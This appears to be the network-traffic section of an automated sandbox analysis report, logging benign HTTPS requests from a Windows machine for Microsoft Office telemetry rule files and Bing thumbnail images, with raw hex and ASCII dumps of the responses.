                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            13192.168.2.64972313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                            x-ms-request-id: 8ba33068-a01e-0070-5caa-3b573b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141717Z-r1d97b99577ndm4rhC1TEBf0ps0000000ah000000000dk0n
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            14192.168.2.64972213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                            x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141717Z-1777c6cb754wcxkwhC1TEB3c6w0000000b2000000000hsds
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            15192.168.2.64972513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                            x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141717Z-178bfbc474bbcwv4hC1NYCypys00000001bg00000000nt7t
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.649728150.171.28.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC375OUTGET /th?id=OADD2.10239351692183_1GSWAYG616F8PFDNZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Length: 878990
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 18CE8B456DD342FEBABF3CA046481587 Ref B: EWR30EDGE0909 Ref C: 2024-11-21T14:17:18Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 20 28 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 32 3a 30 36 3a 32 38 20 31 31 3a 31 31 3a 30 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                            Data Ascii: JFIF`` (ExifMM*bj(1r2i``Adobe Photoshop 21.1 (Windows)2022:06:28 11:11:068
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 85 1a 14 63 04 e2 fd ee 85 3d 2b fd 23 cb 7a eb ec 6d a4 8b f7 1f f3 ce ab e8 7a 7c 1f bb 7f f9 67 ff 00 3c eb b0 b5 81 3e fd 79 58 cc 42 bd a2 7b f9 7e 11 c6 17 6f 53 26 3d 2a 3b 88 77 bf fd b3 ab d1 c1 b2 1f 21 ea c5 f2 fe e7 e4 aa 11 b4 9f 6b f9 2b 81 49 cd 6a 7a 7c b1 83 d8 ce d7 34 18 e5 f2 de 3a af fd 87 1a 7d ca ea 36 f9 b0 d5 7d b1 a5 69 1c 45 44 ad 73 29 61 29 39 39 5b 73 83 93 43 91 f5 0f 93 fd 5d 5a 93 48 fb 3f cf 5d 74 76 db e6 de 94 47 14 7f ea df fd 5d 74 bc 64 e5 63 8e 39 7d 28 df 43 8d ba b3 4b 8b 4f f9 e7 24 75 97 e4 49 5e 81 7d a6 5a 5c 7c f0 7f ac 8e b2 6f b4 af f4 4d 89 fb b9 3f e5 a5 74 51 c5 45 ab 1c 98 9c bd fc 4b 53 9c b1 f3 3c ed f5 bd a6 b7 f0 3f ee e9 9a 6e 87 1b cd bd 3f 79 45 d2 c9 69 36 c7 ff 00 96 75 a5 49 c6 a3 b4 59 8d 1a
                                                                                                                                                                                                            Data Ascii: c=+#zmz|g<>yXB{~oS&=*;w!k+Ijz|4:}6}iEDs)a)99[sC]ZH?]tvG]tdc9}(CKO$uI^}Z\|oM?tQEKS<?n?yEi6uIY
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 3a 27 4e 3e dd c6 0d 69 ae 9f d7 43 be d3 7f b5 af 74 98 d3 c9 9a ca ea 3d f1 dc c7 6d 16 cf 2f f8 37 ab ee f9 a9 ba e7 88 ff 00 b3 f4 39 34 1f 15 f8 6e ef 51 9e f6 d9 e3 92 e6 c7 7b cd bf 66 d6 f7 fb 95 c2 f8 0f e2 0f 8c 2e 3c 41 1d ad ae a5 35 ec 7a 8e fb 7f 32 e6 2d 97 3e 52 ec 6f bd d1 7f 82 bb 0b 5b c8 f5 df ed 2f b2 cd a8 5c 4f 6f fe 8f 27 df 49 ad ff 00 bc aa ff 00 c7 54 f0 b3 8b e5 ab d0 f4 e9 e3 23 52 17 a6 9a 7b 34 c7 4f 7d a2 ea 7e 21 8f c3 50 79 32 5a c7 64 ff 00 bb 96 5d 9f 79 36 6c 6f fd 08 57 1b f1 42 cf 52 f0 7f 89 ed b5 bf 0f 5e 5d c7 69 6f 22 79 71 dc ca ef ff 00 00 f9 bf 86 bd 63 ec 3a 4d dc 3f d9 1f ea e7 8e d9 24 d3 6f 65 ff 00 5d fe d7 bd 79 7f c5 3f ed 96 b5 fe c8 d6 ef 2e e4 8e ca 59 ae 23 bd b6 f9 d3 cd d9 b2 38 df fb bb 57 7d 2c
                                                                                                                                                                                                            Data Ascii: :'N>iCt=m/794nQ{f.<A5z2->Ro[/\Oo'IT#R{4O}~!Py2Zd]y6loWBR^]io"yqc:M?$oe]y?.Y#8W},
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: f0 55 ef 36 b9 88 2e 64 ad 1b 5b c9 1f ef d7 2d 5a 0d 33 b2 8d 74 d5 99 b3 ba 3a 8a e2 b2 e4 bc f2 aa 58 ef 11 eb 1f 64 ce 88 d6 83 1b 7d 16 fa cd 9e ce ae 5f 6a 11 c5 f2 55 5f ed 28 2b 68 46 69 6c 73 d4 a9 49 bd 59 8f ac 2c 9e 4e ca cb 9f e7 ad 8d 56 58 2e 21 93 65 64 ed af 4a 8d f9 6c cf 1f 13 67 3b a2 be da 6c 8b 56 36 9a 64 8b 5b a7 63 93 94 8a 8f b9 4e db 46 da b2 07 c6 db 28 76 a6 6d a3 6d 4f 28 ef a1 af a5 2e c8 77 d6 a4 73 ec 8b e7 ac bb 1f 31 2d 2a 5f 37 64 3b e7 ae 2a 90 e6 91 e9 d1 9a 84 12 1d a9 4b e7 43 f2 56 24 8b b2 6a 7c f3 c8 f3 53 37 6f fb f5 d3 08 38 a3 86 bd 65 51 ea 3d 2a 48 e5 a8 79 a4 8e b4 e5 4c 88 c9 a6 6b f9 f5 5e 79 f7 d4 1e 6d 32 3a c6 30 57 36 95 57 25 a1 2c 75 3c 6d fb 9a a3 be 4a 9f fe 59 d3 94 6e 14 e7 a9 63 cd ad 1b 16 df
                                                                                                                                                                                                            Data Ascii: U6.d[-Z3t:Xd}_jU_(+hFilsIY,NVX.!edJlg;lV6d[cNF(vmmO(.ws1-*_7d;*KCV$j|S7o8eQ=*HyLk^ym2:0W6W%,u<mJYnc
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: d4 f6 24 6e da 73 ac 94 54 c9 48 a5 12 bd 15 2c 9f 3d 33 6d 03 6a cc 8e 45 a3 69 a9 36 d3 76 d3 b9 03 76 9a 36 9a 76 da 36 d3 01 bb 4d 1b 4d 3b 6d 3b 6d 48 0d db 56 23 8b 65 32 05 df 57 e3 b3 8d ff 00 e5 b5 4b 92 46 b4 e9 b9 5f 41 b6 36 de 6f df ad 18 e7 8e de 1d 9e 4f ef 2a 5b 1b 39 1e 1d 8f 5a d6 b6 30 3c 3b 1f f7 95 c3 52 b4 5b d4 f5 f0 f8 69 db 4d 0e 76 f9 a4 fb ef 4e b5 8a 37 87 7b d6 cb d9 c6 93 79 0f ff 00 2d 2b 3a 7b 6f f9 61 5a 46 a2 6a c6 55 28 ce 2f 9b 70 d3 6f 3c a9 a3 4a eb 2c 60 8e e3 e7 7a e4 ec 62 8d 2b a2 f0 ac f2 3c db 1f fd 5d 73 62 e2 ed 78 f4 3b 30 12 7a 29 f5 26 d4 a0 8d 3e 4a e7 af 96 48 bc c4 7a eb 75 c5 8f ef d6 1e b1 6d f6 8f 29 eb 2c 3c f6 b9 be 2a 9d ef 63 06 36 d9 35 58 db 27 df fe 0a 72 41 1a 4d 56 bc f8 ed fe 4a ed 94 af b1
                                                                                                                                                                                                            Data Ascii: $nsTH,=3mjEi6vv6v6MM;m;mHV#e2WKF_A6oO*[9Z0<;R[iMvN7{y-+:{oaZFjU(/po<J,`zb+<]sbx;0z)&>JHzum),<*c65X'rAMVJ
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: ed a6 92 3b 69 62 f9 24 f9 0f dd f9 bf bd 4a 97 b4 e6 6a d6 b7 e2 5d 67 46 d1 b3 bb 7b eb b1 c6 7c 72 f0 fc 7a 4c df db da 7c 3f 67 8e de 4f de f9 7f 73 e6 fb bf fa 15 72 1a 1f 8a bc 4f 69 77 14 e9 77 1c 77 76 f1 f9 71 c9 e5 3c bf 27 f1 57 b7 f8 ab c3 8f e3 5f 01 dc c9 6b 79 0c 77 57 12 f9 91 fd 9a 57 d9 bd 9f f7 7f eb 78 5c b5 78 bf c3 3d 3f 5a 9b c4 da b6 90 86 6b 7b e8 f4 e9 ad 3f d5 7f 1e fd be 5b ed f5 af 46 9d 65 28 b4 d6 c7 85 8a c0 b8 d6 8c e3 d7 5b 9e 9f e0 df 89 1a 34 57 71 cf e2 19 a1 b7 fe d5 b6 fd ed cc 5b ff 00 d6 c7 fe ad bf d8 fb 89 5c e7 8b 62 9e ef c6 fa b6 a9 1e 8f 35 cf 87 2f 63 fb 5c 77 bf 7d 23 b7 fb 9b 9d ff 00 bd eb 4b f1 5f c0 36 36 3e 2c b1 b2 d0 66 fb 15 ae a3 6d 0c 7f f4 c6 3b 85 f9 25 f9 7f da fb ff 00 2f f7 2b 6b e0 9d 9d dc
                                                                                                                                                                                                            Data Ascii: ;ib$Jj]gF{|rzL|?gOsrOiwwwvq<'W_kywWWx\x=?Zk{?[Fe([4Wq[\b5/c\w}#K_66>,fm;%/+k
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: d2 f9 52 ec 4f f9 67 5f 63 85 ab 09 d0 8d 45 b5 8f 84 c6 51 94 31 13 a3 24 b4 7d 36 2d 5d 5b dd ad af da 9e 19 bc 8f f9 e9 4f f0 94 0f 2c 97 0f ff 00 3d 3e 48 fc cf fc 7a 8f 0c eb 4f a7 cd e4 09 7f eb 9d 6f 47 79 a5 5d c3 f6 ab ab 38 6d e4 f2 ff 00 d6 58 cb b3 cb 6f f6 92 ae 32 52 92 91 cd 51 4d 41 c2 c6 1e a8 d3 dd b4 96 bf 64 f3 1e 3f f9 67 5c fd bc ae ba 94 8e 9f bb ae df 4e b2 f3 ae ff 00 7d 77 0f 91 e6 7f ac 96 5f 2b 65 63 78 f3 44 93 4d d4 3c f8 62 ff 00 45 b8 e9 27 f0 52 95 48 49 f2 a9 2b ae 9d 47 84 a9 1d 61 6d c7 69 7f 65 bd 86 47 83 ce f3 2d ff 00 e5 9f 95 be ba 09 24 82 df cb 9f 4b f2 7f d2 64 48 e4 f2 bf e5 de 5f f7 6b 98 f0 9d 8a 3e a1 89 26 9a de 39 23 f3 2e 3c af bf b6 ba 98 2e 6c 25 b4 f9 3f 79 07 fc f3 fe 3f 97 f8 ab 9f dd bd 9a 3b a3 49
                                                                                                                                                                                                            Data Ascii: ROg_cEQ1$}6-][O,=>HzOoGy]8mXo2RQMAd?g\N}w_+ecxDM<bE'RHI+GamieG-$KdH_k>&9#.<.l%?y?;I
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16065INData Raw: 47 25 64 fd 85 fc df 39 3c af de 51 cd cc 8a d2 12 6a 4a cc d4 f0 b6 97 71 a8 49 20 f3 fe c7 18 8d 3c c9 25 8b 7f ca df 2d 7d 31 e0 7b 39 35 0d 26 c6 7d 46 f3 cc 92 3b 2f b3 c9 1c bf f2 d3 fd aa f9 f7 c3 3e 20 7d 12 68 de e6 cf cd 8f fe 5a 79 9f c1 b6 bd 7f e1 47 88 20 ba f0 cf 9c 66 fb 34 97 12 ef 8f cd 97 e4 ff 00 b6 75 e3 e6 d0 ad ca 9a e8 7d 3f 0f 54 c3 5e 49 a7 cd 6b b3 13 f6 91 d1 74 db 2f 0d d8 bc 13 79 97 71 ca f1 c5 f7 37 f9 5f dd af 0b 8d ab ea 0d 4b 5c f0 d6 a7 ab 47 a7 6a 93 68 76 f3 fc f2 47 1d f4 5b fe 4a f3 cd 53 e1 3a 5e ff 00 a6 e8 fa 96 9f 71 3d c5 ec d1 ff 00 72 db 6f df 5d 9b 7e ed 56 07 10 a1 4f 92 aa b7 99 9e 6b 81 9d 6a ce ad 1b 3e 96 5e 47 93 da dc f9 57 71 3f fa bf de 7f ac af 7d fd 9f 56 3b 7d 3f 52 b2 f3 bf 7f e6 3f 9b 1f fb 7f
                                                                                                                                                                                                            Data Ascii: G%d9<QjJqI <%-}1{95&}F;/> }hZyG f4u}?T^Ikt/yq7_K\GjhvG[JS:^q=ro]~VOkj>^GWq?}V;}?R?
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 2a f3 be 13 ea d1 e9 1a 0c 37 bf 69 fd dc 97 b2 ef 7f dd 33 fd f5 df cd 70 62 e4 a0 fd 8c 63 ac ba 9e b6 1f 08 f1 14 25 3a 95 34 d7 fa f3 3c 97 47 f1 3f 9f f0 f7 5b d1 12 1f 2e fa 48 ac e3 8a 48 be 4f 33 65 ca 57 b4 68 fe 36 d7 5f c2 71 dd 3d 9f ee fe 49 23 f2 a2 9b 7d be df f6 bf dd 4f e1 fc ab e6 3f 02 b4 79 92 f6 f8 ff 00 c7 bc 9f bb 8f fd da ec 3c 39 e2 cd 4a ca eb ed b0 5d fd a1 3f e7 ce 5f b9 5e 4d 79 53 f7 69 cd bb a7 ba fe bc 82 96 71 f5 47 ec f9 6f 65 6b fd e7 b4 5f 5e 78 6a ef e2 c6 9b ad e9 77 90 c9 25 ed b3 dc 5c de dc c5 e7 3d c2 2a 79 7b 7e 75 60 9b 7c a4 fb df f3 d2 a9 68 fe 1e d2 7f e1 61 49 e2 bb a9 ae ff 00 79 73 f6 88 a3 b1 d3 ff 00 db ff 00 76 b8 2f 09 f8 f7 5a d3 fc 6d ff 00 09 2b c3 98 fe cd f6 7f b3 0f 91 36 33 ee f9 56 bd 17 4d f8
                                                                                                                                                                                                            Data Ascii: *7i3pbc%:4<G?[.HHO3eWh6_q=I#}O?y<9J]?_^MySiqGoek_^xjw%\=*y{~u`|haIysv/Zm+63VM
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC16384INData Raw: 7f f3 ef 1f fa ef b9 ff 00 3c ea 8a 6a 7e 74 7b ee a2 9a 39 bf e9 9d 74 b9 28 d6 f7 b6 3d 78 63 31 74 61 ec b4 94 0d 0d 52 7b bd 4f 56 b9 d4 6e a6 8b ed 77 b7 2f 25 cc 7f 73 e7 ff 00 76 92 eb 48 be b7 f9 24 b4 97 17 1f ea ee 3f e5 97 fd f7 55 6e a7 fb 44 3f 69 b2 8b cc 9a 39 36 49 1f f1 55 87 b9 f1 05 b1 8e 38 6d 25 b8 b5 8e 47 f3 23 8f fe f9 f9 ab bf 11 cb 28 46 51 57 47 9f 25 56 6f 6d 7c c9 26 5d 76 5b 5c ff 00 64 79 9e 5f c9 27 ef 7f 87 fd 9d b5 bd f0 eb 5c 4f 0d 6b 76 ba 85 97 fc 4b ae ad bc ef b4 49 17 fa e9 d1 93 fd 53 af 4a a6 d6 d2 25 af 9d 65 ff 00 7f 23 97 ee 2d 7b 1f 85 7e 24 7c 3a fe cd 8b 45 d7 bc 35 16 a3 63 67 6c 9f bd b9 b4 4b 99 a3 7f e3 ff 00 6b 6b 77 ae 59 55 5e f5 a3 a0 65 b5 e3 ed 97 be a9 db 6d 1f e3 bf de 60 47 a7 f8 5f ed 76 37 af
                                                                                                                                                                                                            Data Ascii: <j~t{9t(=xc1taR{OVnw/%svH$?UnD?i96IU8m%G#(FQWG%Vom|&]v[\dy_'\OkvKISJ%e#-{~$|:E5cglKkkwYU^em`G_v7


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.649727150.171.28.10443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:17 UTC346OUTGET /th?id=OADD2.10239351692182_1I6V30R2J66NF61KL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-21 14:17:18 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                            Content-Length: 731103
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 68C9BEEC830845ADAF16DFF424A03959 Ref B: EWR30EDGE0107 Ref C: 2024-11-21T14:17:18Z
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:17 GMT
                                                                                                                                                                                                            Connection: close
